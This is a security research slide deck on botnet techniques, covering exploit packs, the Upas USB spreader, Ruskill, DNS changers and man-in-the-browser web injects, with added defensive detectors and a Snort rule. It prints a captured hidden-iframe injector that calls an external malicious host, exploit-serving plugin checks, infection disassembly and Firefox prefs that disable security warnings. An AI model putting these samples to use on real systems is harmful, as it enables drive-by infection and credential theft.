About Us 



■ Aditya K Sood 

• PhD Candidate at Michigan State University 

- Working with iSEC Partners 

- Founder, SecNiche Security Labs 

- Worked previously for Armorize, Coseinc and KPMG 

- Active Speaker at Security conferences 

- LinkedIn: http://www.linkedin.com/in/adityaks 

- Website: http://www.secniche.org | Blog: http://secniche.blogspot.com 

- Twitter: @AdityaKSood 

■ Dr. Richard J Enbody 

• Associate Professor, CSE, Michigan State University 

- Since 1987, teaching computer architecture / computer security / mathematics 

- Co-Author of the CS1 Python book, The Practice of Computing using Python. 

- Patents Pending - Hardware Buffer Overflow Protection 
Disclaimer 



■ This research relates to my own efforts and does not provide the 
view of any of my present and previous employers. 
Rise of Third Generation Botnets (TGB) 
TGB Infections started with Zeus 



Bot Spreading Mechanisms 
Widely Deployed 



Browser Exploit Packs 



■ Browser Exploit Packs (BEPs) 

— Overview 

• Automated frameworks containing browser exploits 

• Implements the concept of Drive-by-Download attacks 

• Exploits are bundled as unique modules 

• Mostly written in PHP + MySQL 

- PHP code is obfuscated with the ionCube encoder 

• Successfully captures the statistics of infected machines 

• Widely used BEPs are BlackHole, Nuclear, Phoenix, etc. 



How is the exploit served? 

• Fingerprinting the browser's environment 

- User-Agent string parameters 

- Plugin detection module - Java / PDF / Flash 

- Custom JavaScript for extracting information from the infected machine 
Browser Exploit Packs 



Obfuscated JavaScripts used in BlackHole Infections 

• Hiding the infected domain 










De-obfuscated script: hidden IFrame injection (URL reproduced as captured, partly garbled by OCR)

    if (document.getElementsByTagName('body')[0]) {
        iframer();
    }
    function iframer() {
        var f = document.createElement('iframe');
        f.setAttribute('src', 'http://4Gei7614E314754156.servehttp.com/efbliupcyve2cbywa/23b7ecanyipva74/eswcwl4Slir.php?ewgewl74efwl7h6reIh47rew65gdfslE6r5h=lEe3594fQe2fld35');
        f.style.visibility = 'hidden';
        f.style.position = 'absolute';
        f.style.left = '1';
        f.style.top = '1';
        f.setAttribute('width', '10');
        f.setAttribute('height', '10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }



Browser Exploit Packs 



Plugin Detection Code 

— Script code taken from real-world case studies 



Recoverable fragments of the captured scripts (the remainder is garbled or redacted in the capture):

    // PluginDetect-style descriptor the pack uses to locate Adobe Reader
    adobereader: {
        mimeType: "application/pdf",
        progIDs: ["AcroPDF.PDF", "PDF.PdfCtrl"],
        classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
        ...
    }

    // version gate: the PDF exploit is only served to Reader versions below 8.0.0
    var inp = pluginDetect.getVersion("AdobeReader").split(".");
    var sv = parseInt(inp[0] + inp[1] + inp[2]);
    if (sv < 800) addp('esgtgnktilct2.pdf');
    ...
    eval('/*hui*/' + waiwai + '/*hui*/');

PDF Plugin Detection 



Demonstration 



Drive-by-Download Attacks 



Drive-by-Download 

• Victim's browser is forced to visit an infected website 

• An IFrame redirects the browser to the BEP 

• The exploit is served after fingerprinting the browser environment 

• The browser is exploited using JavaScript heap spraying 

• The BEP silently downloads the malware onto the victim machine 



Drive-by-Download Frameworks 



Drive-by-Download Frameworks 

— Java Drive-by Generator 



Screenshot: Java Drive-by Generator control panel ("Welcome Administrator"). Recoverable fields:
  Choose Method: HTML Based Drive-By / Clone Website (Soon!) / JAR Based Drive-By
  Template Options: Select Template / Other Options
  Drop Options: Drop Name (random executable name), Drop Location
  General Options: Program URL, Admin Control Panel URL
  Advanced Options: Encryption (BETA), Level 1 / Level 2 / Level 3 / Level 4
  Redirect Options: Activate Redirect, Run Redirect
  Custom Publisher: Publisher Name, Organization Name, Organization Unit, City, State, Country, Project Name (all filled with random strings)
  Buttons: Generate Now, About, Exit
Demonstration 



Spreaders 



USB Spreading (Upas Bot - Case Study) 

— Inside USB Spreader 

- Widely used technique in bot design for infecting USB devices 

— Win32 Implementation 

• Bot calls the RegisterDeviceNotificationW function 

» It can also be implemented as a Windows service 



    push    ebp
    mov     ebp, esp
    sub     esp, 20h
    and     [ebp+NotificationFilter], 0
    push    edi
    push    7
    pop     ecx
    xor     eax, eax
    lea     edi, [ebp+var_1C]
    rep stosd
    lea     eax, [ebp+pclsid]
    push    eax                             ; pclsid
    push    offset sz                       ; "{a5dcbf10-6530-11d2-901f-00c04fb951ed}"
    call    ds:CLSIDFromString
    push    <value lost in capture>         ; Flags
    lea     eax, [ebp+NotificationFilter]
    push    eax                             ; NotificationFilter
    push    [ebp+hRecipient]                ; hRecipient
    mov     [ebp+var_1C], 5                 ; dbcc_devicetype = DBT_DEVTYP_DEVICEINTERFACE
    mov     [ebp+NotificationFilter], 20h   ; dbcc_size = sizeof(DEV_BROADCAST_DEVICEINTERFACE_W)
    call    ds:RegisterDeviceNotificationW

GUID for Raw USB ({a5dcbf10-6530-11d2-901f-00c04fb951ed} is GUID_DEVINTERFACE_USB_DEVICE, the device interface GUID placed in dbcc_classguid) 
Spreaders 



■ USB Spreading (Upas Bot - Case Study) 

— Plug and Play (PnP) devices have a unique set of different GUIDs 

- Device interface GUID 

» Required for dbcc_classguid in DEV_BROADCAST_DEVICEINTERFACE 

- Device class GUID 

» Defines a wide range of devices 

• Defines WindowProc as follows 

» WM_DEVICECHANGE notification message with DEV_BROADCAST_HDR 
» dbch_devicetype -> DBT_DEVTYP_DEVICEINTERFACE 

• Waits for the USB device and triggers the device-change event as follows: 

- wParam in WindowProc 

» DBT_DEVICEARRIVAL | DBT_DEVICEREMOVALCOMPLETE 

- Fetches the drive letter of the USB device as follows 

» dbcv_unitmask in _DEV_BROADCAST_VOLUME | Logical drive information 



• Continued 
Spreaders 



■ USB Spreading (Upas Bot - Case Study) 

— On successfully detecting the USB device, the bot executes the following functions: 

- CopyFileW to copy the malicious executable onto the USB drive 

- CreateFileW to create the autorun.inf file in the USB root directory 

- SetFileAttributesW to apply the required file attributes 



    push    [ebp+arg_4]
    lea     eax, [ebp+FileName]
    push    [ebp+arg_0]
    push    offset aWsWsaexe        ; "%ws%ws_a.exe"
    push    ebx
    push    eax
    call    sub_40291B              ; builds the target path on the USB drive
    add     esp, 14h
    xor     ebx, ebx
    push    ebx                     ; bFailIfExists
    lea     eax, [ebp+FileName]
    push    eax                     ; lpNewFileName
    push    edi                     ; lpExistingFileName
    call    esi                     ; CopyFileW
    push    6                       ; dwFileAttributes = FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM
    lea     eax, [ebp+FileName]
    push    eax                     ; lpFileName
    call    ds:SetFileAttributesW

Autorun.inf infection 

    push    offset aWsautoruninf    ; "%wsautorun.inf"
    lea     eax, [ebp+var_980]
    push    esi
    push    eax
    call    sub_40291B
    push    [ebp+arg_4]
    lea     eax, [ebp+Buffer]
    push    offset aAutorunOpenWs   ; "[autorun]\r\nopen=%ws_a.exe\r\n"
    push    104h
    push    eax
    call    sub_4028EC
    add     esp, 20h
    push    ebx                     ; hTemplateFile
    push    80h                     ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
    push    2                       ; dwCreationDisposition = CREATE_ALWAYS
    push    ebx                     ; lpSecurityAttributes
    push    ebx                     ; dwShareMode
    push    0C0000000h              ; dwDesiredAccess = GENERIC_READ | GENERIC_WRITE
    lea     eax, [ebp+var_980]
    push    eax                     ; lpFileName
    call    ds:CreateFileW
Spreaders 



USB Spreading (Upas Bot - Case Study) 

— Infecting USB devices using Malicious .LNK file infection 



.LNK infection 

    push    offset aWsWs            ; "%ws%ws"
    push    esi
    push    eax
    call    sub_40291B
    lea     eax, [ebp+FindFileData.cFileName]
    push    eax
    push    [ebp+arg_0]
    lea     eax, [ebp+var_B8C]
    push    offset aWsWs_lnk        ; "%ws%ws.lnk"
    push    esi
    push    eax
    call    sub_40291B
    push    [ebp+arg_4]
    lea     eax, [ebp+var_774]
    push    eax
    lea     eax, [ebp+var_B8C]
    push    eax
    call    sub_<lost in capture>
    add     esp, <lost in capture>
    lea     eax, [ebp+var_774]
    push    eax                     ; lpFileName
    call    ds:GetFileAttributesW

    loc_404B86:
    lea     eax, [ebp+FindFileData.cFileName]
    push    [ebp+arg_0]
    push    offset aLnk             ; ".lnk"
    lea     eax, [ebp+var_980]
    push    eax                     ; wchar_t *
    push    offset aWs_1            ; "%ws*"
    call    wcsstr
    push    esi
    pop     ecx
    push    eax
    pop     ecx
    call    sub_40291B
    test    eax, eax
    add     esp, 18h
    jnz     loc_404D27
    lea     eax, [ebp+FindFileData]
    push    eax                     ; lpFindFileData
    lea     eax, [ebp+var_980]
    push    eax                     ; lpFileName
    call    ds:FindFirstFileW

    push    [ebp+arg_8]
    mov     esi, [ebp+arg_4]
    push    esi
    push    offset aCStartWsStartW  ; "/C start \"\" \"%ws\" && start \"\" \"%ws_1.e..." (truncated in capture)
    lea     eax, [ebp+var_214]
    push    209h
    push    eax
    call    sub_40291B
    add     esp, 14h
    push    1000h                   ; uFlags
    push    ebx                     ; cbFileInfo
    lea     eax, [ebp+psfi]
    push    eax                     ; psfi
    push    edi                     ; dwFileAttributes
    push    esi                     ; pszPath
    call    ds:SHGetFileInfoW
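A defender-side triage of a removable drive root for the three artefacts this spreader leaves behind (an autorun.inf launch entry, a hidden+system payload executable, and a decoy .lnk shadowing a hidden folder), as an added Python example that is not from the slides or from the bot; the directory entries and the autorun.inf text are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Entry:
    """One root-directory entry; a constructed stand-in for WIN32_FIND_DATA fields."""
    name: str
    is_dir: bool = False
    hidden: bool = False
    system: bool = False


# Keys in [autorun] that launch something when the drive is inserted.
LAUNCH_KEY_RE = re.compile(
    r"^\s*(?P<key>open|shellexecute|shell\\[^=\]]*\\command)\s*=\s*(?P<value>.+?)\s*$",
    re.IGNORECASE,
)


def parse_autorun(text: str) -> List[str]:
    """Return every launch target declared in the [autorun] section."""
    targets, in_autorun = [], False
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith("[") and stripped.endswith("]"):
            in_autorun = stripped.lower() == "[autorun]"
            continue
        if not in_autorun or stripped.startswith(";"):
            continue
        m = LAUNCH_KEY_RE.match(line)
        if m:
            targets.append(m.group("value"))
    return targets


def triage_removable(entries: List[Entry], autorun_text: Optional[str]) -> List[str]:
    """Flag the artefacts Upas leaves on a drive root, in directory order."""
    findings = []
    by_name = {e.name.lower(): e for e in entries}
    if autorun_text is not None:
        for target in parse_autorun(autorun_text):
            exe = target.split()[0].strip('"').lower()
            where = " (present on drive)" if exe in by_name else ""
            findings.append(f"autorun.inf launches {target!r}{where}")
    for e in entries:
        lower = e.name.lower()
        if lower.endswith(".lnk"):
            # the decoy .lnk carries the name of the real item, which was made hidden
            twin = by_name.get(lower[:-4])
            if twin is not None and (twin.hidden or twin.system):
                kind = "folder" if twin.is_dir else "file"
                findings.append(f"{e.name} mirrors hidden {kind} {twin.name!r}")
        elif e.hidden and e.system and lower.endswith(".exe"):
            # attribute 6 (hidden | system) is what SetFileAttributesW applied to the payload
            findings.append(f"hidden+system executable {e.name!r} at drive root")
    return findings


# Constructed drive contents modelled on the slides: hidden payload "<name>_a.exe",
# an autorun.inf pointing at it, and a decoy .lnk shadowing a hidden folder.
SAMPLE_ENTRIES = [
    Entry("autorun.inf", hidden=True, system=True),
    Entry("photos", is_dir=True, hidden=True, system=True),
    Entry("photos.lnk"),
    Entry("report.docx"),
    Entry("drive_a.exe", hidden=True, system=True),
]
SAMPLE_AUTORUN = "[autorun]\r\nopen=drive_a.exe\r\n"

if __name__ == "__main__":
    for finding in triage_removable(SAMPLE_ENTRIES, SAMPLE_AUTORUN):
        print(finding)
```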
Spreaders 



■ USB Spreading (Upas Bot - Case Study) 

Upas in action 

    push    edi
    push    offset aC               ; "%c:\\"
    lea     eax, [ebp+var_C]
    push    9
    push    eax
    call    sub_40291B
    lea     eax, [ebp+var_C]
    push    offset ValueName
    push    eax
    call    sub_404A97
    push    edi
    push    offset aDataUsbInfecte  ; "data=USB<|>Infected Drive %c:\\<||>\r\n"
    lea     eax, [ebp+var_130]
    push    1B3h
    push    eax
    call    sub_4028EC
    push    offset a1               ; "1.0.0.0"
    push    offset aActSpreadingV   ; "?act=spreading&ver=%s"
    lea     eax, [ebp+var_2C]
    push    1Dh

C&C-side log of the spreading reports (as captured):

    Infected Drive E:\\
    Infected Drive H:\\
    Infected Drive F:\\
    Infected Drive H:\\
    Infected Drive H:\\
    Infected Drive F:\\
    Infected Drive G:\\
    Infected Drive F:\\
    Infected Drive F:\\
    Infected Drive H:\\
    Infected Drive F:\\
    Infected Drive F:\\



Spreaders 

■ Upas Bot Network Behavior Detection 

— Writing signature specific to USB infection 



alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS 
( 

    msg:"Win32.Upas - Runtime Detection"; 
    flow:to_server,established; 
    content:"POST "; 
    depth:5; 

    uricontent:"?act=spreading&ver="; 
    nocase; 

    content:"|0D 0A 0D 0A|data=USB|3C 7C 3E|Infected Drive"; 
    nocase; 

    classtype:Worm; reference:SNS; 
    sid:110034567; 
    rev:1; 
) 
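The rule's three anchors (the POST request line, the ?act=spreading&ver= query marker and the data=USB<|>Infected Drive body prefix) applied to raw HTTP requests in Python, as an added example that is not part of the original slides; the sample requests are constructed and the C&C host name is a placeholder.

```python
import re
from typing import List, Optional, Union

# Constructed sample traffic (not a real capture). The beacon mirrors the format strings in
# the disassembly: "?act=spreading&ver=%s" and "data=USB<|>Infected Drive %c:\\<||>\r\n".
UPAS_BEACON = (
    "POST /gate.php?act=spreading&ver=1.0.0.0 HTTP/1.1\r\n"
    "Host: c2.example.invalid\r\n"          # placeholder C&C host
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 35\r\n"
    "\r\n"
    "data=USB<|>Infected Drive F:\\<||>\r\n"
)
BENIGN_POST = (
    "POST /login HTTP/1.1\r\n"
    "Host: www.example.invalid\r\n"
    "\r\n"
    "user=alice&pass=hunter2\r\n"
)

# The three anchors of the Snort rule, as byte regexes.
REQUEST_LINE = re.compile(rb"^POST (?P<uri>\S+) HTTP/1\.[01]\r\n")
QUERY_MARKER = re.compile(rb"\?act=spreading&ver=(?P<ver>[^&\s]*)", re.IGNORECASE)
BODY_MARKER = re.compile(
    rb"^data=USB<\|>Infected Drive (?P<drive>[A-Za-z]):\\<\|\|>", re.IGNORECASE
)


def match_upas_beacon(raw: bytes) -> Optional[dict]:
    """Return beacon details when `raw` matches the Upas spreading report, else None."""
    m = REQUEST_LINE.match(raw)                   # rule: content:"POST "; depth:5
    if not m:
        return None
    q = QUERY_MARKER.search(m.group("uri"))       # rule: uricontent:"?act=spreading&ver="
    if not q:
        return None
    _head, sep, body = raw.partition(b"\r\n\r\n")  # rule: |0D 0A 0D 0A| then the body
    if not sep:
        return None
    b = BODY_MARKER.match(body)                   # rule: data=USB|3C 7C 3E|Infected Drive
    if not b:
        return None
    return {
        "uri": m.group("uri").decode("ascii", "replace"),
        "version": q.group("ver").decode("ascii", "replace"),
        "drive": b.group("drive").decode("ascii").upper(),
    }


def scan_requests(requests: List[Union[bytes, str]]) -> List[dict]:
    """Run the matcher over a batch of raw requests; one alert per hit."""
    alerts = []
    for index, req in enumerate(requests):
        data = req if isinstance(req, bytes) else req.encode("utf-8")
        hit = match_upas_beacon(data)
        if hit:
            alerts.append({"index": index, "msg": "Win32.Upas - Runtime Detection", **hit})
    return alerts


if __name__ == "__main__":
    for alert in scan_requests([BENIGN_POST, UPAS_BEACON]):
        print(alert)
```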




POST Exploitation 
Subverting System Integrity 



Understanding Ruskill 



What is Ruskill ? 



— A term coined in Russia 

• It refers to the group of warriors who demonstrate their skill in the battle 

• Typically used by Diablo game players to demonstrate their strength and power 

— How does Ruskill relate to bots? 

• Ruskill module is used to demonstrate the capability of bots 

• Removing traces of malware in the system after successful reboot 
Understanding Ruskill 

■ Inside Ruskill Module 

— Found in NGR (Dorkbot) 

— Remote file downloading and execution 

• Ruskill allows the bot to fetch any executable from third-party resource and 
execute it in the compromised system 

— Restoring System 

• Ruskill monitors all the changes performed by the malicious executable in the 
system 

• Ruskill restores the registry, files and network settings to the same state (before 
the execution of the malicious binary) after reboot 

• Deletes the malicious executable after successful execution in the system 
Understanding Ruskill 



Inside Ruskill Module 

    loc_40DB41:
    mov     edx, off_415784
    push    esi                     ; arglist
    push    offset aRuskillDetecte  ; "[Ruskill]: Detected file: \"%s\""
    push    edx                     ; int
    push    offset dword_44AD98     ; int
    call    sub_40BA00
    add     esp, 10h
    jmp     loc_40DC82

    mov     eax, off_415784
    push    esi                     ; arglist
    push    offset aRuskillDetec_0  ; "[Ruskill]: Detected DNS: \"%s\""
    push    eax                     ; int
    push    offset dword_44AD98     ; int
    call    sub_40BA00
    add     esp, 10h
    jmp     loc_40DC82

    mov     ecx, off_415784
    push    esi                     ; arglist
    push    offset aRuskillDetec_1  ; "[Ruskill]: Detected Reg: \"%s\""
    push    ecx                     ; int
    push    offset dword_44AD98     ; int
    call    sub_40BA00
    add     esp, 10h
    jmp     loc_40DC82

Ruskill detecting file, DNS and registry modifications 
Demonstration 



Critical Problem - DNS Changer 



DNSChanger apocalypse: press coverage 

- "DNSChanger cutoff is more whimper than bang. Score one for the good guys." 
  Cutting off Internet access to computers infected with the nasty DNSChanger trojan did not bring 
  about doomsday after all. Why, beyond the obvious, that's good news in the cybersecurity world. 

- "DNSChanger Doomsday" 
  The FBI is pulling the plug on rogue DNS servers on Monday, meaning those who haven't cleaned up 
  their computers could be stranded without Internet. Which begs the question, should they even be 
  allowed Internet access? 

- "Don't forget: DNSChanger malware could kill your internet on Monday" 

- "Facebook warns users of the end of the Internet via DNSChanger" 

- "Internet blackout looms for 300K DNSChanger-infected computers" 

- "FBI Limits DNSChanger Malware Damage; No 'Internet Doomsday'" 

- "DNSChanger Shutdown, Despite Laggards, Is a Good Thing" 

- "The FBI shut down servers that allowed more than 4 million virus-infected computers to access internet" 

- "DNSChanger operation shuts down, leaving some without access to web" 
DNS Changer in Action 

DNS Changer 

— Exploiting the DNS resolution functionality of the infected machine 

— What is it used for? 

• Blocking security providers' websites (implementing blacklists) 

- Blocking the microsoft.com update website to restrict the downloading of updates 

- Restricting the opening of anti-virus vendors' websites 

• Redirecting the browser to the malicious domain 

- Forcing the infected machine to download updates from the malicious domain 

- Triggering chain infection for downloading another set of malware onto the 
infected system 



DNS Changer in Action 



■ DNS Changer 

— How does this work? 

• Replacing the DNS server entries in the infected machine with the IP addresses of 
the malicious DNS server 

• Adding rogue entries in the hosts configuration file 

• Executing a DNS amplification attack by subverting the integrity of LAN 
devices such as routers and gateways 

- It results in DNS hijacking at a large scale in the network 

• Hooking DNS libraries 

- The preferred method is inline hooking, in which detour and trampoline functions 
are created to play with DNS-specific DLLs. 
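Two host-side checks for the first two mechanisms above (replaced resolver addresses and rogue hosts-file entries that blackhole update and anti-virus sites or redirect them elsewhere), as an added Python example that is not from the slides; the watch-list of protected domains, the hosts file and the resolver addresses are constructed.

```python
import ipaddress
from typing import Dict, List, Tuple

# Constructed watch-list in the spirit of the slide: update and anti-virus sites a DNS
# changer is interested in. Extend it with the vendors actually deployed.
PROTECTED_SUFFIXES = ("microsoft.com", "windowsupdate.com", "kaspersky.com", "example-av.invalid")


def _is_protected(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in PROTECTED_SUFFIXES)


def parse_hosts(text: str) -> List[Tuple[str, List[str]]]:
    """Parse hosts-file text into (address, [hostnames]) pairs, ignoring comments."""
    mappings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        try:
            ipaddress.ip_address(parts[0])
        except ValueError:
            continue                       # malformed address field, not a mapping
        mappings.append((parts[0], parts[1:]))
    return mappings


def audit_hosts(text: str) -> List[Dict[str, str]]:
    """Flag protected names that the hosts file blackholes or redirects."""
    findings = []
    for addr, names in parse_hosts(text):
        ip = ipaddress.ip_address(addr)
        for name in names:
            if not _is_protected(name):
                continue
            if ip.is_loopback or ip.is_unspecified:
                verdict = "blocked"        # sinkholed to 127.0.0.1 / 0.0.0.0 / ::1
            else:
                verdict = f"redirected to {addr}"
            findings.append({"host": name, "address": addr, "verdict": verdict})
    return findings


def audit_resolvers(configured: List[str], approved: List[str]) -> List[str]:
    """Return configured DNS servers that are not on the approved list."""
    ok = {ipaddress.ip_address(a) for a in approved}
    return [s for s in configured if ipaddress.ip_address(s) not in ok]


# Constructed hosts file and resolver settings (addresses from documentation ranges).
SAMPLE_HOSTS = """\
127.0.0.1       localhost
# vendor sites blackholed
127.0.0.1       update.microsoft.com windowsupdate.microsoft.com
0.0.0.0         www.kaspersky.com
198.51.100.7    download.microsoft.com   # redirected to a rogue server
192.0.2.10      intranet.corp.invalid
"""
SAMPLE_RESOLVERS = ["10.0.0.53", "203.0.113.99"]
APPROVED_RESOLVERS = ["10.0.0.53", "10.0.0.54"]

if __name__ == "__main__":
    for f in audit_hosts(SAMPLE_HOSTS):
        print(f)
    print("rogue resolvers:", audit_resolvers(SAMPLE_RESOLVERS, APPROVED_RESOLVERS))
```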
DNS Changer in Action 

DNS Changer 

— Inside DNS hooking 

• Hooking DNS API 

- Hooking DnsQuery(*) function calls in dnsapi.lib/dnsapi.dll 

- Implemented by creating a blacklist 

- Bot hijacks the DNS resolution flow by filtering all the incoming DNS requests 

• Hooking DNS Cache Resolver Service 

- Cache resolver service is used for DNS caching 

- Bot hooks the sendto function in ws2_32.dll to verify the origin of the DNS query, i.e. to 
validate whether sendto is being called by dnsrslvr.dll 



DNS Changer in Action 



DNS Changer 

— Implementation in NGR bot 



    mov     eax, [esi+edi*4+4]
    mov     ecx, [esi+edi*4+8]
    push    eax                     ; char
    push    offset aS_0             ; "%s"
    push    offset aBdns            ; "bdns"
    push    ecx                     ; lpString
    call    sub_407500
    call    sub_40A970              ; resolves and calls DnsFlushResolverCache (listed below)
    mov     edx, [esi+edi*4+8]
    mov     eax, [esi+edi*4+4]
    mov     ecx, [ebp+lpString2]
    push    edx
    mov     edx, [ebp+arg_0]
    push    eax                     ; arglist
    push    offset aDnsRedirecting  ; "[DNS]: Redirecting \"%s\" to \"%s\""
    push    ecx                     ; int
    push    edx                     ; int
    call    sub_40BA00
    add     esp, 24h
    pop     edi

    loc_40E703:
    mov     ecx, [ebp+var_4]
    mov     edx, off_415770
    push    ecx
    push    eax                     ; arglist
    push    offset aDnsBlockedDDon  ; "[DNS]: Blocked %d domain(s) - Redirecte"... (truncated in capture)
    push    edx                     ; int
    push    offset dword_44AD98     ; int
    call    sub_40BA00
    add     esp, 14h

    sub_40A970 proc near
    push    offset aDnsflushresolv  ; "DnsFlushResolverCache"
    push    offset aDnsapi_dll      ; "dnsapi.dll"
    call    sub_403920
    push    eax
    call    sub_403750
    test    eax, eax
    jnz     short loc_40A98A
Demonstration 



Certificate Deletion 



Certificate Deletion 

— Removing all instances of private certificates from the infected machine 



    sub_4141F4 proc near
    push    ebx
    push    edi
    push    offset szSubsystemProtocol ; "MY"
    push    <value lost in capture> ; hProv
    xor     bl, bl
    call    ds:CertOpenSystemStoreW
    mov     edi, eax
    test    edi, edi
    jz      short loc_41423F
    push    ebp
    mov     ebp, ds:CertEnumCertificatesInStore
    push    esi
    push    <value lost in capture>
    jmp     short loc_41422A

    loc_414217:                     ; pCertContext
    push    esi
    call    ds:CertDuplicateCertificateContext
    test    eax, eax
    jz      short loc_414229
    push    eax                     ; pCertContext
    call    ds:CertDeleteCertificateFromStore

    loc_41422A:
    push    edi                     ; hCertStore
    call    ebp                     ; CertEnumCertificatesInStore
    mov     esi, eax
    test    esi, esi
    jnz     short loc_414217

    push    eax                     ; dwFlags
    push    edi                     ; hCertStore
    mov     bl, 1
    call    ds:CertCloseStore
    pop     esi
    pop     ebp

ICE IX bot - certificate deletion module 
Cryptovirology in Action 



Cryptovirology 

— Exploiting the Built-in Windows Crypto APIs 

— Cryptovirology allows malware authors to build robust malware 

— How Cryptovirology is used in designing bots? 

• Generating random filenames for bots 

• Creating registry entries with random keys 

• Highly used for generating random DNS server entries 

- All DNS entries map to the same IP address 

• Of course, encrypted communication between infected machine and C&C 
server 

• Verifying the integrity of malicious files downloaded in the system 

- Scrutinizing the bots 




Cryptovirology in Action 



Cryptovirology 

— An instance from ICE IX bot - Windows Crypto API misuse 



    push    ebx
    push    0F0000040h              ; dwFlags = CRYPT_VERIFYCONTEXT | CRYPT_SILENT
    push    1                       ; dwProvType = PROV_RSA_FULL
    xor     ebx, ebx
    push    ebx                     ; pszProvider
    push    ebx                     ; pszContainer
    lea     eax, [ebp+hProv]
    push    eax                     ; phProv
    mov     [ebp+var_1], bl
    call    ds:CryptAcquireContextW

    lea     eax, [ebp+hHash]
    push    eax                     ; phHash
    push    ebx                     ; dwFlags
    push    ebx                     ; hKey
    push    8003h                   ; Algid = CALG_MD5
    push    [ebp+hProv]             ; hProv
    call    ds:CryptCreateHash      ; Initiate the hashing of a stream of data

    push    ebx                     ; dwFlags
    push    [ebp+dwDataLen]         ; dwDataLen
    mov     [ebp+pdwDataLen], 10h
    push    [ebp+pbData]            ; pbData
    push    [ebp+hHash]             ; hHash
    call    ds:CryptHashData        ; Compute the cryptographic hash on a stream of data

    push    ebx                     ; dwFlags
    lea     eax, [ebp+pdwDataLen]
    push    eax                     ; pdwDataLen
    push    [ebp+arg_0]             ; pbData
    push    2                       ; dwParam = HP_HASHVAL
    push    [ebp+hHash]             ; hHash
    call    ds:CryptGetHashParam
    cmp     eax, 1
    jnz     short loc_4083B6
    cmp     [ebp+pdwDataLen], 10h   ; expects a 16-byte digest, i.e. the MD5 of the data
    jnz     short loc_4083B6

    loc_4083B6:                     ; hHash
    push    [ebp+hHash]
    call    ds:CryptDestroyHash
    mov     [ebp+var_1], al
Exploiting Browsers 
Data Exfiltration Over HTTP 
Downgrading Browser Security 



■ Removing Protections 

— Nullifying browser client side security to perform stealthy operations 

— Internet Explorer 

• Tampering with zone values in the registry 

- \Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones 

— Firefox 

• Manipulating entries in the user.js file 

- user_pref("security.warn_submit_insecure", false); 

» The browser no longer raises an alert box when form data is submitted over plain HTTP. 

- user_pref("security.warn_viewing_mixed", false); 

» Removes the warning about mixed content on an SSL page. 



Old-school trick, but it works very effectively. Several other techniques 
for subverting browser security also exist. 
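A user.js audit that parses user_pref() lines, flags the two prefs above when they have been set to false and emits the lines that restore them; an added Python example, not from the slides, with a constructed user.js.

```python
import json
import re
from typing import Dict, List, Tuple, Union

PrefValue = Union[bool, int, str]

# The two prefs named on the slide and the value a hardened profile should carry.
EXPECTED: Dict[str, PrefValue] = {
    "security.warn_submit_insecure": True,
    "security.warn_viewing_mixed": True,
}

# user_pref("name", value); with a quoted string, true/false or an integer value.
PREF_RE = re.compile(
    r'^\s*user_pref\(\s*"(?P<name>[^"]+)"\s*,\s*'
    r'(?P<value>"(?:[^"\\]|\\.)*"|true|false|-?\d+)\s*\)\s*;',
    re.IGNORECASE,
)


def _convert(token: str) -> PrefValue:
    if token.lower() == "true":
        return True
    if token.lower() == "false":
        return False
    if token.startswith('"'):
        return token[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return int(token)


def parse_user_js(text: str) -> Dict[str, PrefValue]:
    """Collect user_pref() settings; later lines override earlier ones, as Firefox does."""
    prefs: Dict[str, PrefValue] = {}
    for line in text.splitlines():
        if line.lstrip().startswith("//"):
            continue
        m = PREF_RE.match(line)
        if m:
            prefs[m.group("name")] = _convert(m.group("value"))
    return prefs


def audit_user_js(text: str) -> List[Tuple[str, PrefValue, PrefValue]]:
    """Return (pref, found, expected) for every watched pref carrying a weaker value."""
    prefs = parse_user_js(text)
    return [(n, prefs[n], want) for n, want in EXPECTED.items() if n in prefs and prefs[n] != want]


def hardened_lines(findings: List[Tuple[str, PrefValue, PrefValue]]) -> List[str]:
    """Emit the user_pref() lines that restore the expected values (JSON literals match user.js)."""
    return [f'user_pref("{name}", {json.dumps(want)});' for name, _found, want in findings]


# Constructed user.js in the shape the slide describes (not a real profile).
SAMPLE_USER_JS = """\
// constructed sample
user_pref("security.warn_submit_insecure", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("browser.startup.homepage", "https://example.invalid");
"""

if __name__ == "__main__":
    for line in hardened_lines(audit_user_js(SAMPLE_USER_JS)):
        print(line)
```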
Man-in-the-Browser (MitB) 



Inside MitB 

— MitB typically refers to a userland rootkit that compromises the browser's 
integrity 

Flow shown in the diagram (user, MitB agent, web server): 

- User opens a web page to initiate a session and make online transactions 

- Web page data, in the form of the HTTP request, is hooked by the MitB agent 

- Tampered web page 

- Altered POST data is sent back to the web server to perform the final operation 
What Lies Beneath? 



Screenshot: Chase Online "My Accounts" page in Internet Explorer with an injected pop-up form. The pop-up text reads: "In order to provide you with extra security, we occasionally need to ask for additional information when you access your accounts online. Please enter the information below to continue," followed by fields for Social Security Number, Driver's License, Date of Birth, ATM Card Number, Card Expiration Date, PIN Code and PIN Code (confirm), and a CONTINUE button. The genuine page behind it shows the checking account balance and the Chase Security Center "Types of Online Fraud" list (Phishing, Fraudulent E-mails, Fraudulent E-mail Examples, Virus or Malware Attacks, Spam Scams, Internet Auctions). 

Note: The pop-up is triggered in the user's 
active session. So what is it actually? 

No doubt it is a pop-up, but the 
technique is termed Web Injects, not 
phishing or anything like that. 



^ W 
Web Injects 



■ Web Injects 

— Based on the concept of hooking specific functions in the browser DLLs 

— On the fly infection tactic 

— Execution flow 

• Bot injects malicious content in the incoming HTTP responses 

• Injections are based on the static file named as webinjects.txt 

• Rules are statically defined by the botmaster 

• Bot fetches rules from the webinjects.txt file and injects them into the live web pages 

— Information stealing in a forceful manner 

• Exploits user ignorance 



Sample rule from a webinjects.txt (as captured; the field name and the injected cell text are partly unreadable):

